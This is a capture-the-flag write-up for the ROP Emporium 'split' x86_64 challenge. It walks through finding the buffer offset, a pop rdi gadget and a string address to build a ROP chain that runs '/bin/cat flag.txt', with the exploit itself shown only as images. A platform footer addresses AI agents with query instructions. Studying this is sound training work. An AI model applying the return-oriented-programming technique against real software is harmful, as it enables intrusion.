> For the complete documentation index, see [llms.txt](https://0x.b4dc0.de/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0x.b4dc0.de/binary-exploitation/rop-emporium/split.md).

# Split

## X86\_64

This challenge is similar to ret2win, but instead of automatically reading the flag when called, the argument "/bin/cat flag.txt" needs to be passed to the function.

#### Determining the buffer size

Similar to the first challenge, we'll use pwndbg and cyclic to determine the size of the buffer we're targeting.

<figure><img src="/files/Vf4F5UndYyGw4NF48BAJ" alt=""><figcaption><p>Determining the size of the buffer</p></figcaption></figure>

<figure><img src="/files/nzJqsP5HYMMRJgw8YPIa" alt=""><figcaption><p>Size of the buffer</p></figcaption></figure>

#### Locating gadgets

Because this challenge requires us to pass an argument to the function, we'll have to locate a few gadgets to get this to work. We'll need to find a gadget that pops the RDI register, the location of the argument required, and the address of the function "usefulFunction."

Starting with the location of the function, you can use radare2 with the "afl" command to list all defined functions in the program.

<figure><img src="/files/a7VVU3eWzjeiRrC0cyzC" alt=""><figcaption><p>usefulFunction location</p></figcaption></figure>

Listing the contents of this function shows that when called, it is set to run "/bin/ls."

<figure><img src="/files/ZLG9sg1Lxkefp9TQTIqL" alt=""><figcaption><p>Contents of usefulFunction</p></figcaption></figure>

Because of this, we'll have to pop the register RDI to call '/bin/cat flag.txt' into that register. This gadget can be located using ropper and grep for rdi. Running this gives us the address of the gadget pop rdi; ret at 0x4007c3.

<figure><img src="/files/9qpHk7LtaEY4w67daagK" alt=""><figcaption><p>pop RDI gadget</p></figcaption></figure>

The final address we need to get is the address of the string '/bin/cat flag.txt.' By running the 'iz' command in radare2 to list all defined strings in the program, doing this gives us the address 0x601060.

<figure><img src="/files/u3Y92bTDo0vjr9pmPLHx" alt=""><figcaption><p>Location of string</p></figcaption></figure>

#### Creating the exploit

Combining all the gadgets that we've located will allow us to run '/bin/cat flag.txt' instead of '/bin/ls.' Starting by overflowing the buffer, then popping the RDI register. This allows us to move whatever data we want into that register; in this case, we load the address of the string '/bin/cat flag.txt.' After this, we call the address of the syscall located within the usefulFunction.

<figure><img src="/files/ySPq4oy8ZkcyxrJi6L7D" alt=""><figcaption><p>Exploit used</p></figcaption></figure>

Running the script will output the flag to the terminal.

<figure><img src="/files/TmAR3nR9MdveuL7AC7Ro" alt=""><figcaption><p>Contents of flag.txt</p></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0x.b4dc0.de/binary-exploitation/rop-emporium/split.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.